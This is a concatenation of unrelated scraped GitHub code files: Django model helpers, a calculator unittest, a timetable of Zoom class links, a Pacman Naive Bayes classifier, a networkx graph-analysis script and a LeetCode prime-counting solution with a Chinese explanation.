CharField,\n DateTimeField,\n ForeignKey,\n IntegerField,\n ImageField,\n DecimalField,\n BooleanField,\n TextField,\n OneToOneField,\n ManyToManyField,\n FileField,\n Model,\n SlugField\n)\nfrom imagekit.processors import ResizeToFill\nfrom imagekit.models import ProcessedImageField, ImageSpecField\nfrom imagekit.processors import Transpose\nfrom tinymce.models import HTMLField\nfrom django.template.defaultfilters import slugify\n\n\ndef get_str(field):\n if field:\n return field\n else:\n return 'Created on {}.'.format(\n self.get_date())\n\n\ndef create_slug(self, slug_field, model):\n max_length = self._meta.get_field('slug').max_length\n slug = slugify(slug_field)[:max_length]\n original = slug\n\n for x in range(1, 1000):\n if not model.objects.filter(slug=slug).exclude(id=self.id).exists():\n break\n\n # Truncate the original slug dynamically. Minus 1 for the hyphen.\n new_max_length = max_length - len(str(x)) - 1\n short_slug = original[:new_max_length]\n slug = \"{}-{}\".format(short_slug, x)\n return slug\n\ndef get_image(self):\n if self.image:\n return self.image.image.url\n else:\n return \"/static/enuda_mag/img/student.jpeg\"\n\n\ndef image_upload_location(instance, filename):\n return \"images/{}\".format(filename)\n\n\nclass IntegerRangeField(IntegerField):\n def __init__(self, verbose_name=None, name=None,\n min_value=None, max_value=None, **kwargs):\n self.min_value, self.max_value = min_value, max_value\n IntegerField.__init__(self, verbose_name, name, **kwargs)\n\n def formfield(self, **kwargs):\n defaults = {'min_value': self.min_value, 'max_value': self.max_value}\n defaults.update(kwargs)\n return super(IntegerRangeField, self).formfield(**defaults)\n\n\nclass TimeStampBaseModel(Model):\n\n timestamp = DateTimeField(\n editable=False, auto_now_add=True, auto_now=False)\n updated = DateTimeField(auto_now=True, blank=True, null=True)\n slug = SlugField(default='', null=True, blank=True)\n\n def get_date(self):\n date = self.timestamp.strftime(\"%A, %d. %B %Y %I:%M%p\")\n return date\n\n def time_ago(self):\n return naturaltime(self.timestamp)\n\n def __str__(self, name=None):\n \"\"\"\n If model has name set that as name.\n\n If model has name or name set by subclass\n Then return that name\n Else return \"Class_Name object #*number* cretaed on *date*\"\n \"\"\"\n\n if name:\n return name\n else:\n return \"{} object #{} created on {}\".format(\n self.__class__.__name__, self.id, self.timestamp\n )\n\n class Meta:\n abstract = True\n\n\nclass NameTimeStampBaseModel(Model):\n\n name = CharField(max_length=80, null=True, blank=True)\n timestamp = DateTimeField(\n editable=False, auto_now_add=True, auto_now=False)\n updated = DateTimeField(auto_now=True, blank=True, null=True)\n slug = SlugField(default='', null=True, blank=True)\n\n def get_date(self):\n date = self.timestamp.strftime(\"%A, %d. %B %Y %I:%M%p\")\n return date\n\n\n def time_ago(self):\n return naturaltime(self.timestamp)\n\n def __str__(self, name=None):\n \"\"\"\n If model has name set that as name.\n\n If model has name or name set by subclass\n Then return that name\n Else return \"Class_Name object #*number* cretaed on *date*\"\n \"\"\"\n if self.name:\n name = self.name\n\n if name:\n return name\n else:\n return \"{} object #{} created on {}\".format(\n self.__class__.__name__, self.id, self.timestamp\n )\n\n class Meta:\n abstract = True\n\n\nclass HTMLContentBaseModel(Model):\n\n content = HTMLField(null=True, blank=True)\n timestamp = DateTimeField(\n editable=False, auto_now_add=True, auto_now=False)\n updated = DateTimeField(auto_now=True, blank=True, null=True)\n slug = SlugField(default='', null=True, blank=True)\n\n def get_date(self):\n date = self.timestamp.strftime(\"%A, %d. %B %Y %I:%M%p\")\n return date\n\n\n def time_ago(self):\n return naturaltime(self.timestamp)\n\n def __str__(self, name=None):\n \"\"\"\n If model has name set that as name.\n\n If model has name or name set by subclass\n Then return that name\n Else return \"Class_Name object #*number* cretaed on *date*\"\n \"\"\"\n if self.name:\n name = self.name\n\n if name:\n return name\n else:\n return \"{} object #{} created on {}\".format(\n self.__class__.__name__, self.id, self.timestamp\n )\n\n class Meta:\n abstract = True\n\nclass Image(NameTimeStampBaseModel):\n # user = OneToOneField(User, related_name=\"image\", null=True, blank=True)\n # content_object = GenericForeignKey('content_type', 'object_id')\n image = ProcessedImageField(processors=[ # ResizeToFill(\n # 100, 50),\n Transpose()],\n upload_to=image_upload_location,\n null=True,\n blank=True,\n format='JPEG',\n options={'quality': 60})\n mid_size = ImageSpecField(source='image',\n processors=[ResizeToFill(750, 450)],\n format='JPEG',\n options={'quality': 60})\n thumbnail = ImageSpecField(source='image',\n processors=[ResizeToFill(80, 80)],\n format='JPEG',\n options={'quality': 60})\n my_namespace = CharField(\n default=\"\", max_length=128, null=True, blank=True)\n \n\n def get_timestamp(self, pretty=False):\n\n if pretty:\n return self.timestamp.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n return self.timestamp.strftime(\"%Y-%m-%d_%H:%M:%S\")\n","repo_name":"KaluEmeKalu/enuda_house_world","sub_path":"enuda_mag/models_utils.py","file_name":"models_utils.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18233818303","text":"# -*- coding: utf-8 -*-\n# Author:jiang\n# 2021/8/24 15:49\nimport unittest\nimport sys\nprint(sys.path)\nsys.path.append(\"..\") #添加上一级路径\nprint(sys.path)\nfrom python.calc import Calc\n\nclass TestCal(unittest.TestCase):\n def test_add_1(self):\n self.calc=Calc()\n result=self.calc.add(1,2)\n self.assertEqual(3,result)\n print(result)\nunittest.main()","repo_name":"jiangdeping/PyTestProject","sub_path":"testing/test_calc.py","file_name":"test_calc.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74370128054","text":"import json\nimport pprint\n\n\ntur = (\"https://us04web.zoom.us/j/8391860248?pwd=UFQ3bmtodVZmMm1NN2wxOFcreWpwZz09\", \"Türkçe\")\nfen = (\"https://us04web.zoom.us/j/8391860248?pwd=UFQ3bmtodVZmMm1NN2wxOFcreWpwZz09\", \"Fen ve Teknoloji\")\nmat = (\"https://us04web.zoom.us/j/8391860248?pwd=UFQ3bmtodVZmMm1NN2wxOFcreWpwZz09\", \"Matematik\")\ncommon = (\"https://us04web.zoom.us/j/8391860248?pwd=UFQ3bmtodVZmMm1NN2wxOFcreWpwZz09\", \"\")\neng = (\"https://us04web.zoom.us/j/9018960986?pwd=Qzk1Sm9kMmxId0NyNnVlR0hSbnRJdz09\", \"İngilizce\")\npe = (\"https://us04web.zoom.us/j/4324908469\", \"Beden Eğitimi\")\nlife = (\"https://us04web.zoom.us/j/8391860248?pwd=UFQ3bmtodVZmMm1NN2wxOFcreWpwZz09\", \"Hayat Bilgisi\")\nrobot = (\"https://us04web.zoom.us/j/5609504756?pwd=MVMzTU8xaTlBV1U3Yjd1RzRVVHRPdz09\", \"Robotik Kodlama\")\nskills = (\"https://us04web.zoom.us/j/2937880883?pwd=MTVLTTdESTUvbzNIUHdmUVNDT3N3QT09\", \"Skills\")\nkuran = (\"https://us04web.zoom.us/j/4103999829\", \"Kuran\")\ngor = (\"https://us04web.zoom.us/j/3314303377\", \"Görsel Sanatlar\")\nmus = (\"https://us04web.zoom.us/j/4975962849\", \"Müzik\")\nvalue = (\"https://us04web.zoom.us/j/6868293773\", \"Değerler Eğitimi\")\n\nprograms = [\n [mat, fen, pe, eng, tur, kuran, tur],\n [tur, eng, skills, mat, life, tur, kuran],\n [mat, fen, life, mus, eng, tur, eng],\n [tur, robot, tur, eng, value, gor, mat],\n [fen, mat, tur, life, tur, eng, eng]\n]\n\n\nlectures = {\n \"Monday\": {1: programs[0][0][0], 2: programs[0][1][0], 3: programs[0][2][0], 4: programs[0][3][0], 5: programs[0][4][0], 6: programs[0][5][0], 7: programs[0][6][0]},\n \"Tuesday\": {1: programs[1][0][0], 2: programs[1][1][0], 3: programs[1][2][0], 4: programs[1][3][0], 5: programs[1][4][0], 6: programs[1][5][0], 7: programs[1][6][0]},\n \"Wednesday\": {1: programs[2][0][0], 2: programs[2][1][0], 3: programs[2][2][0], 4: programs[2][3][0], 5: programs[2][4][0], 6: programs[2][5][0], 7: programs[2][6][0]},\n \"Thursday\": {1: programs[3][0][0], 2: programs[3][1][0], 3: programs[3][2][0], 4: programs[3][3][0], 5: programs[3][4][0], 6: programs[3][5][0], 7: programs[3][6][0]},\n \"Friday\": {1: programs[4][0][0], 2: programs[4][1][0], 3: programs[4][2][0], 4: programs[4][3][0], 5: programs[4][4][0], 6: programs[4][5][0], 7: programs[4][6][0]}\n}\n\n\ndef dump():\n\n with open(\"docs/calendar.json\", \"w\") as file:\n\n json.dump(lectures, file, indent=2)\n\n\ndef load():\n\n with open(\"docs/calendar.json\", \"r\") as file:\n\n dic = json.load(file)\n\n pprint.pprint(dic)\n\n\n# dump()\n# load()\n","repo_name":"fatom98/Calendar","sub_path":"docs/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31337047883","text":"# naiveBayes.py\n# -------------\n# Licensing Information: Please do not distribute or publish solutions to this\n# project. You are free to use and extend these projects for educational\n# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by\n# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and Pieter \n# Abbeel in Spring 2013.\n# For more info, see http://inst.eecs.berkeley.edu/~cs188/pacman/pacman.html\n\nimport util\nimport classificationMethod\nimport math\n\nclass NaiveBayesClassifier(classificationMethod.ClassificationMethod):\n \"\"\"\n See the project description for the specifications of the Naive Bayes classifier.\n\n Note that the variable 'datum' in this code refers to a counter of features\n (not to a raw samples.Datum).\n \"\"\"\n def __init__(self, legalLabels):\n self.legalLabels = legalLabels\n self.type = \"naivebayes\"\n self.k = 1 # this is the smoothing parameter, ** use it in your train method **\n self.automaticTuning = False # Look at this flag to decide whether to choose k automatically ** use this in your train method **\n\n def setSmoothing(self, k):\n \"\"\"\n This is used by the main method to change the smoothing parameter before training.\n Do not modify this method.\n \"\"\"\n self.k = k\n\n def train(self, trainingData, trainingLabels, validationData, validationLabels):\n \"\"\"\n Outside shell to call your method. Do not modify this method.\n \"\"\"\n\n # might be useful in your code later...\n # this is a list of all features in the training set.\n self.features = list(set([ f for datum in trainingData for f in datum.keys() ]));\n\n if (self.automaticTuning):\n kgrid = [0.001, 0.01, 0.05, 0.1, 0.5, 1, 2, 5, 10, 20, 50]\n else:\n kgrid = [self.k]\n\n self.trainAndTune(trainingData, trainingLabels, validationData, validationLabels, kgrid)\n\n def trainAndTune(self, trainingData, trainingLabels, validationData, validationLabels, kgrid):\n \"\"\"\n Trains the classifier by collecting counts over the training data, and\n stores the Laplace smoothed estimates so that they can be used to classify.\n Evaluate each value of k in kgrid to choose the smoothing parameter\n that gives the best accuracy on the held-out validationData.\n\n trainingData and validationData are lists of feature Counters. The corresponding\n label lists contain the correct label for each datum.\n\n To get the list of all possible features or labels, use self.features and\n self.legalLabels.\n \"\"\"\n\n bestAccuracy = -1\n globalPrev = util.Counter() \n globalConditionalProbability = util.Counter()\n globalNum = util.Counter() \n\n for i in range(len(trainingData)):\n label = trainingLabels[i]\n \n for feature, value in trainingData[i].items():\n globalNum[(feature,label)] += 1\n if(value)==1:\n globalConditionalProbability[(feature, label)] += 1\n globalPrev[label] += 1\n\n for k in kgrid:\n prev = util.Counter()\n conditionalProbability = util.Counter()\n num = util.Counter()\n\n for key,val in globalPrev.items():\n prev[key]+=val\n for key,val in globalNum.items():\n num[key]+=val\n for key,val in globalConditionalProbability.items():\n conditionalProbability[key]+=val\n\n for label in self.legalLabels:\n for feature in self.features:\n conditionalProbability[(feature,label)] +=k\n num[(feature,label)] += k*2 \n\n \n for i,count in conditionalProbability.items():\n conditionalProbability[i] = count * float(1.0/ num[i])\n\n self.prev = prev\n self.prev.normalize()\n self.conditionalProbability = conditionalProbability\n\n pred = self.classify(validationData)\n accuracyCount = sum([pred[i] == validationLabels[i] for i in range(len(validationLabels))])\n\n if(accuracyCount > bestAccuracy):\n bestParams = (prev,conditionalProbability,k)\n bestAccuracy = accuracyCount\n\n self.prev = bestParams[0]\n self.conditionalProbability = bestParams[1]\n self.k = bestParams[2]\n\n\n \"*** YOUR CODE HERE ***\"\n \n\n def classify(self, testData):\n \"\"\"\n Classify the data based on the posterior distribution over labels.\n\n You shouldn't modify this method.\n \"\"\"\n guesses = []\n self.posteriors = [] # Log posteriors are stored for later data analysis (autograder).\n for datum in testData:\n posterior = self.calculateLogJointProbabilities(datum)\n guesses.append(posterior.argMax())\n self.posteriors.append(posterior)\n return guesses\n\n def calculateLogJointProbabilities(self, datum):\n \"\"\"\n Returns the log-joint distribution over legal labels and the datum.\n Each log-probability should be stored in the log-joint counter, e.g.\n logJoint[3] = \n\n To get the list of all possible features or labels, use self.features and\n self.legalLabels.\n \"\"\"\n logJoint = util.Counter()\n\n for label in self.legalLabels:\n logJoint[label] = math.log(self.prev[label])\n\n for feature, value in datum.items():\n if(value)==1:\n logJoint[label] +=math.log(self.conditionalProbability[feature,label])\n else:\n logJoint[label] += math.log(1 - self.conditionalProbability[feature,label])\n return logJoint\n\n def findHighOddsFeatures(self, label1, label2):\n \"\"\"\n Returns the 100 best features for the odds ratio:\n P(feature=1 | label1)/P(feature=1 | label2)\n\n Note: you may find 'self.features' a useful way to loop through all possible features\n \"\"\"\n featuresOdds = []\n\n \"*** YOUR CODE HERE ***\"\n \n for feature in self.features:\n featuresOdds.append((self.conditionalProbability[(feature, label1)]/self.conditionalProbability[feature,label2],feature))\n featuresOdds = [feature for value, feature in sorted(featuresOdds[-100:])]\n\n return featuresOdds\n","repo_name":"hgrov52/pacman-AI","sub_path":"classification/classification/classification/naiveBayes.py","file_name":"naiveBayes.py","file_ext":"py","file_size_in_byte":6567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20887610895","text":"# https://www.acmicpc.net/problem/2839\nimport sys\nsys.stdin = open(\"input/설탕배달_input.txt\", \"r\")\n\nn = int(input())\ncount = 0\ndef solution(n):\n count = 0\n while n >= 0:\n if n % 5 == 0:\n count += (n//5)\n print(count)\n break\n n -= 3\n count += 1\n else:\n print(-1)\n\nsolution(n)","repo_name":"kimgahyeon/algorithm","sub_path":"백준/2839.py","file_name":"2839.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18364312977","text":"import networkx as nx # Network operations\nimport numpy as np # Reading .mtx\nfrom scipy.io import mmread # Reading .mtx\nimport matplotlib.pyplot as plt # Basic plotting\nimport operator # Sorting and converting dictionary to a list\nimport pandas as pd # Tables and visualization\nimport collections # Counting\nimport community # Communities\n\ndef mtx_to_graphi(graph, name):\n \"\"\"Converts mtx file to graphi file for further visualization\n\n Args:\n graph (graph): .mtx file graph loaded in networkx.Graph() method.\n name (str): output file name\n \"\"\"\n\n with open('data/'+ name +'.graphml', 'wb') as output_file:\n nx.write_graphml(graph, output_file)\n \n print(name +'.graphml file generated')\n \n\n\ndef network_elements(graph):\n\n \"\"\"Prints basic global and local graph properties\n\n Args:\n graph (graph): .mtx file graph loaded in networkx.Graph() method.\n \"\"\"\n\n # Check if network is directed\n print('Basic graph info: ')\n print('Is directed:', nx.is_directed(graph))\n print('Is weighted:', nx.is_weighted(graph))\n print('Is connected:',nx.is_connected(graph))\n\n \n # Assignment 1\n total_nodes = graph.number_of_nodes()\n print('Broj cvorova N u grafu: ' + str(total_nodes))\n total_edges = graph.number_of_edges()\n print('Broj veza K u grafu: ' + str(total_edges))\n print('Prosjecan broj ulaznih/izlaznih veza: ' + str(len(list(nx.average_degree_connectivity(graph)))))\n # Assignmnt 2\n # Not a directed graph, so average input/output connections are not calculated.\n \n # Assignment 3\n total_weight = graph.size(weight='weight')\n avg_weight = total_weight / total_nodes\n print('Ukupna snaga grafa: ' + str(total_weight))\n print('Prosjecna snaga grafa: ' + str(avg_weight))\n \n # Assignment 4\n conn_comp = nx.number_connected_components(graph)\n conn_comp_max = len(list(max(nx.connected_components(graph), key=len)))\n print('Broj komponenti grafa: ' + str(conn_comp))\n print('Velicina najvece komponente grafa: ' + str(conn_comp_max))\n \n # Assignment 5\n avg_path = nx.average_shortest_path_length(graph)\n print('Prosjecni najkraci put grafa: ' + str(avg_path))\n diam = nx.diameter(graph)\n print('Diametar grafa: ' + str(diam))\n # Eccentricity type: dictionary\n eccent = nx.eccentricity(graph)\n avg_eccent = float(sum(eccent.values())) / len(eccent)\n print('Prosjecna ekscentricnost grafa: ' + str(avg_eccent))\n \n # Assignment 6\n global_eff = nx.global_efficiency(graph)\n print('Globalna ucinkovitost: ' + str(global_eff))\n \n # Assignement 7\n glob_clustering = len(nx.clustering(graph))\n print('Globalni koeficijent grupiranja: ' + str(glob_clustering))\n \n # Assignment 8\n avg_clustering = nx.average_clustering(graph)\n print('Prosjecni koeficijent grupiranja: ' + str(avg_clustering))\n \n # Assignment 9\n node_assortativity = nx.degree_assortativity_coefficient(graph)\n print('Asortativnost s obzirom na stupanj cvora: ' + str(node_assortativity))\n \n # Assignment 10 \n\n degree_sequence = sorted([d for n, d in graph.degree()], reverse=True) # degree sequence\n degreeCount = collections.Counter(degree_sequence)\n deg, cnt = zip(*degreeCount.items())\n\n fig, ax = plt.subplots()\n plt.bar(deg, cnt, width=0.80, color=\"b\")\n\n plt.title(\"Degree Histogram\")\n plt.ylabel(\"Count\")\n plt.xlabel(\"Degree\")\n ax.set_xticklabels(deg)\n plt.savefig('plots/plot_degree.png')\n \n # Assignment 11\n degree_cent = nx.degree_centrality(graph)\n betw_cent = nx.betweenness_centrality(graph)\n closeness_cent = nx.closeness_centrality(graph)\n\n # Converted dict to list\n sorted_degree = sorted(degree_cent.items(), key=operator.itemgetter(1), reverse=True)\n sorted_between = sorted(betw_cent.items(), key=operator.itemgetter(1), reverse=True)\n sorted_closeness = sorted(closeness_cent.items(), key=operator.itemgetter(1), reverse=True)\n \n degree_df = pd.DataFrame(sorted_degree, columns=['Node','Degree Centrality'])\n between_df = pd.DataFrame(sorted_between, columns=['Node','Betweeness Centrality'])\n closeness_df = pd.DataFrame(sorted_closeness, columns=['Node','Closeness Centrality'])\n \n print('Degree: ')\n print(degree_df.head(n=10))\n print('Betweeness: ')\n print(between_df.head(n=10))\n print('Closeness: ')\n print(closeness_df.head(n=10))\n \n # Assignment 12\n avg_closeness = float(sum(closeness_cent.values())) / len(closeness_cent)\n print('Prosjecna centralnost blizine: ' + str(avg_closeness))\n\n # Assignment 13\n avg_between = float(sum(betw_cent.values())) / len(betw_cent)\n print('Prosjecna medupolozenost: ' + str(avg_between))\n \n\ndef centralities(graph):\n \"\"\"Calculates local properties (centrality tables) \n Instructions: \n https://networkx.org/documentation/stable/reference/algorithms/centrality.html\n\n Args:\n graph (graph): .mtx file graph loaded in networkx.Graph() method.\n \"\"\"\n \n eigenvector_cent = nx.eigenvector_centrality(graph)\n print('Centrality 1 generated')\n harmonic_cent = nx.harmonic_centrality(graph)\n print('Centrality 2 generated')\n subgraph_cent = nx.subgraph_centrality(graph)\n print('Centrality 3 generated')\n curr_clos_cent = nx.current_flow_closeness_centrality(graph)\n print('Centrality 4 generated')\n load_cent = nx.load_centrality(graph)\n print('Centrality 5 generated')\n\n\n # Converting dict to list\n eigenvector_sorted = sorted(eigenvector_cent.items(), key=operator.itemgetter(1), reverse=True)\n harmonic_sorted = sorted(harmonic_cent.items(), key=operator.itemgetter(1), reverse=True)\n subgraph_sorted = sorted(subgraph_cent.items(), key=operator.itemgetter(1), reverse=True)\n curr_clos_sorted = sorted(curr_clos_cent.items(), key=operator.itemgetter(1), reverse=True)\n load_cent_sorted = sorted(load_cent.items(), key=operator.itemgetter(1), reverse=True)\n\n # Converting list to dataframe\n eigenvector_df = pd.DataFrame(eigenvector_sorted, columns=['Node','Eigen Vector'])\n harmonic_df = pd.DataFrame(harmonic_sorted, columns=['Node','Harmonic'])\n subgraph_df = pd.DataFrame(subgraph_sorted, columns=['Node','Subgraph'])\n curr_clos_df = pd.DataFrame(curr_clos_sorted, columns=['Node','Current Flow closeness'])\n load_cent_df = pd.DataFrame(load_cent_sorted, columns=['Node','Load centrality: '])\n \n # Printing tables\n print('\\n5 ADDITIONAL CENTRALITIES:\\n')\n print('Eigenvector: ')\n print(eigenvector_df.head(n=10))\n print('Harmonic: ')\n print(harmonic_df.head(n=10))\n print('Subgraph: ')\n print(subgraph_df.head(n=10))\n print('Current flow closeness: ')\n print(curr_clos_df.head(n=10))\n print('Load centrality: ')\n print(load_cent_df.head(n=10))\n\n\ndef community_analysis(graph):\n \"\"\"Network analysis on meso scale level\n\n Args:\n graph (graph): .mtx file graph loaded in networkx.Graph() method.\n \"\"\"\n \n # Assignment 14\n np.random.seed(42)\n\n partition = community.best_partition(graph)\n\n comm_nodes = collections.Counter(partition.values())\n sorted_communities = sorted(comm_nodes.items(), key=operator.itemgetter(1), reverse=True)\n\n communities_df = pd.DataFrame(sorted_communities, columns=['Community','Nodes'])\n \n print('Top 10 communities:')\n print(communities_df.head(n=10))\n\n # Graphing\n size = float(len(set(partition.values())))\n pos = nx.spring_layout(graph)\n count = 0.\n for com in set(partition.values()) :\n count = count + 1.\n list_nodes = [nodes for nodes in partition.keys()\n if partition[nodes] == com]\n nx.draw_networkx_nodes(graph, pos, list_nodes, node_size = 20,\n node_color = str(count / size))\n\n\n nx.draw_networkx_edges(graph,pos, alpha=0.5)\n plt.savefig('plots/plot_communities.png')\n\n\npsmigr1 = mmread('data/econ-psmigr1.mtx')\nG_psmigr1 = nx.Graph(psmigr1)\n\n# Function calls\nmtx_to_graphi(G_psmigr1, 'psmigr1')\nnetwork_elements(G_psmigr1)\ncentralities(G_psmigr1)\ncommunity_analysis(G_psmigr1)","repo_name":"ailic96/UZ_networks","sub_path":"uz_networks.py","file_name":"uz_networks.py","file_ext":"py","file_size_in_byte":8241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21180627304","text":"from django.shortcuts import render\nfrom blog.models import Post\nfrom books.models import Book, Quote, Author \nfrom events.models import Event\n\ndef home(request):\n posts = Post.objects.all()[:3]\n books = Book.objects.all()\n events = Event.objects.all()\n quotes = Quote.objects.all()\n authors = Author.objects.all()\n return render(request, 'home/home.html',\n {'posts': posts,\n 'books': books,\n 'events': events,\n 'quotes': quotes,\n 'authors': authors})","repo_name":"maciejurm/zyjswiadomieeuv3","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10078642138","text":"'''\n204. Count Primes\nCount the number of prime numbers less than a non-negative number, n.\n\nExample:\n\nInput: 10\nOutput: 4\nExplanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\n\n204. 计数质数\n统计所有小于非负整数 n 的质数的数量。\n\n示例:\n\n输入: 10\n输出: 4\n解释: 小于 10 的质数一共有 4 个, 它们是 2, 3, 5, 7 。\n'''\n\n\nimport math\nclass Solution(object):\n def countPrimes(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n is_prime_dict = [1] * n\n is_prime_dict[:2] = [0 ] *2\n def is_prime(num):\n for i in range(2, int(math.sqrt(num) ) +1):\n if num % i == 0:\n return False\n return True\n\n\n for i in range(2, int(math.sqrt(n)) + 1):\n if is_prime(i):\n is_prime_dict[ i *2:n:i] = [0] * (( n -1 - 2* i) // i + 1)\n\n return sum(is_prime_dict)\n\n\n\nclass Solution20201203(object):\n def countPrimes(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n def is_prime(n):\n for i in range(2, int(math.sqrt(n))+1):\n if n % i == 0:\n return False\n return True\n if n < 2:\n return 0\n prime_dict = [1 for _ in range(n)]\n\n for i in range(2, int(math.sqrt(n))+1):\n if is_prime(i):\n prime_dict[i*2:n:i] = [0]*((n-1 - i*2)//i+1)\n\n return sum(prime_dict) - 2\n\n\nif __name__ == '__main__':\n print(bin(100)[::-1][:-2])\n\n# solution\n\n'''\n前言\n统计 [2,n][2,n] 中质数的数量是一个很常见的题目,也有很多巧妙高效的做法,接下来的部分只会讲述一些常见的做法,更多的拓展内容读者可以自行搜索补充,也欢迎在评论区与大家分享交流。\n\n方法一:枚举\n很直观的思路是我们枚举每个数判断其是不是质数。\n\n考虑质数的定义:在大于 11 的自然数中,除了 11 和它本身以外不再有其他因数的自然数。因此对于每个数 xx,我们可以从小到大枚举 [2,x-1][2,x−1] 中的每个数 yy,判断 yy 是否为 xx 的因数。但这样判断一个数是否为质数的时间复杂度最差情况下会到 O(n)O(n),无法通过所有测试数据。\n\n考虑到如果 yy 是 xx 的因数,那么 \\frac{x}{y} \ny\nx\n​\t\n 也必然是 xx 的因数,因此我们只要校验 yy 或者 \\frac{x}{y} \ny\nx\n​\t\n 即可。而如果我们每次选择校验两者中的较小数,则不难发现较小数一定落在 [2,\\sqrt{x}][2, \nx\n​\t\n ] 的区间中,因此我们只需要枚举 [2,\\sqrt{x}][2, \nx\n​\t\n ] 中的所有数即可,这样单次检查的时间复杂度从 O(n)O(n) 降低至了 O(\\sqrt{n})O( \nn\n​\t\n )。\n\nC++JavaJavaScriptGolangC\n\n// 超时警告\nfunc isPrime(x int) bool {\n for i := 2; i*i <= x; i++ {\n if x%i == 0 {\n return false\n }\n }\n return true\n}\n\nfunc countPrimes(n int) (cnt int) {\n for i := 2; i < n; i++ {\n if isPrime(i) {\n cnt++\n }\n }\n return\n}\n复杂度分析\n\n时间复杂度:O(n\\sqrt{n})O(n \nn\n​\t\n )。单个数检查的时间复杂度为 O(\\sqrt{n})O( \nn\n​\t\n ),一共要检查 O(n)O(n) 个数,因此总时间复杂度为 O(n\\sqrt{n})O(n \nn\n​\t\n )。\n\n空间复杂度:O(1)O(1)。\n\n方法二:埃氏筛\n枚举没有考虑到数与数的关联性,因此难以再继续优化时间复杂度。接下来我们介绍一个常见的算法,该算法由希腊数学家厄拉多塞(\\rm EratosthenesEratosthenes)提出,称为厄拉多塞筛法,简称埃氏筛。\n\n我们考虑这样一个事实:如果 xx 是质数,那么大于 xx 的 xx 的倍数 2x,3x,\\ldots2x,3x,… 一定不是质数,因此我们可以从这里入手。\n\n我们设 \\textit{isPrime}[i]isPrime[i] 表示数 ii 是不是质数,如果是质数则为 11,否则为 00。从小到大遍历每个数,如果这个数为质数,则将其所有的倍数都标记为合数(除了该质数本身),即 00,这样在运行结束的时候我们即能知道质数的个数。\n\n这种方法的正确性是比较显然的:这种方法显然不会将质数标记成合数;另一方面,当从小到大遍历到数 xx 时,倘若它是合数,则它一定是某个小于 xx 的质数 yy 的整数倍,故根据此方法的步骤,我们在遍历到 yy 时,就一定会在此时将 xx 标记为 \\textit{isPrime}[x]=0isPrime[x]=0。因此,这种方法也不会将合数标记为质数。\n\n当然这里还可以继续优化,对于一个质数 xx,如果按上文说的我们从 2x2x 开始标记其实是冗余的,应该直接从 x\\cdot xx⋅x 开始标记,因为 2x,3x,\\ldots2x,3x,… 这些数一定在 xx 之前就被其他数的倍数标记过了,例如 22 的所有倍数,33 的所有倍数等。\n\nC++JavaJavaScriptGolangC\n\nfunc countPrimes(n int) (cnt int) {\n isPrime := make([]bool, n)\n for i := range isPrime {\n isPrime[i] = true\n }\n for i := 2; i < n; i++ {\n if isPrime[i] {\n cnt++\n for j := 2 * i; j < n; j += i {\n isPrime[j] = false\n }\n }\n }\n return\n}\n复杂度分析\n\n时间复杂度:O(n\\log \\log n)O(nloglogn)。具体证明这里不再展开,读者可以自行思考或者上��搜索,本质上是要求解 \\sum_{p}\\frac{n}{p}∑ \np\n​\t\n \np\nn\n​\t\n 的和,其中 pp 为质数。当然我们可以了解这个算法一个比较松的上界 O(n\\log n)O(nlogn) 怎么计算,这个等价于考虑 \\sum_{i=1}^{n}\\frac{n}{i}∑ \ni=1\nn\n​\t\n \ni\nn\n​\t\n 的和,而 O(\\sum_{i=1}^{n}\\frac{n}{i}) = O(n\\sum_{i=1}^{n}\\frac{1}{i})O(∑ \ni=1\nn\n​\t\n \ni\nn\n​\t\n )=O(n∑ \ni=1\nn\n​\t\n \ni\n1\n​\t\n ),而 11 到 nn 中所有数的倒数和趋近于 \\log nlogn,因此 O(n\\sum_{i=1}^{n}\\frac{1}{i})=O(n\\log n)O(n∑ \ni=1\nn\n​\t\n \ni\n1\n​\t\n )=O(nlogn)。\n空间复杂度:O(n)O(n)。我们需要 O(n)O(n) 的空间记录每个数是否为质数。\n方法三:线性筛\n此方法不属于面试范围范畴,本节只做简单讲解。\n\n埃氏筛其实还是存在冗余的标记操作,比如对于 1515 这个数,它会同时被 3,53,5 两个数标记为合数,因此我们优化的目标是让每个合数只被标记一次,这样时间复杂度即能保证为 O(n)O(n),这就是我们接下来要介绍的线性筛。\n\n相较于埃氏筛,我们多维护一个 \\textit{primes}primes 数组表示当前得到的质数集合。我们从小到大遍历,如果当前的数 xx 是质数,就将其加入 \\textit{primes}primes 数组。\n\n另一点与埃氏筛不同的是,“标记过程”不再仅当 xx 为质数时才进行,而是对每个整数 xx 都进行。对于整数 xx,我们不再标记其所有的倍数 x\\cdot x,x\\cdot (x+1),\\ldotsx⋅x,x⋅(x+1),…,而是只标记质数集合中的数与 xx 相乘的数,即 \\textit{primes}_0*x,\\textit{primes}_1*x,\\ldotsprimes \n0\n​\t\n ∗x,primes \n1\n​\t\n ∗x,…,且在发现 x\\bmod \\textit{primes}_i=0xmodprimes \ni\n​\t\n =0 的时候结束当前标记。\n\n核心点在于:如果 xx 可以被 \\textit{primes}_iprimes \ni\n​\t\n 整除,那么对于合数 y=x\\cdot \\textit{primes}_{i+1}y=x⋅primes \ni+1\n​\t\n 而言,它一定在后面遍历到 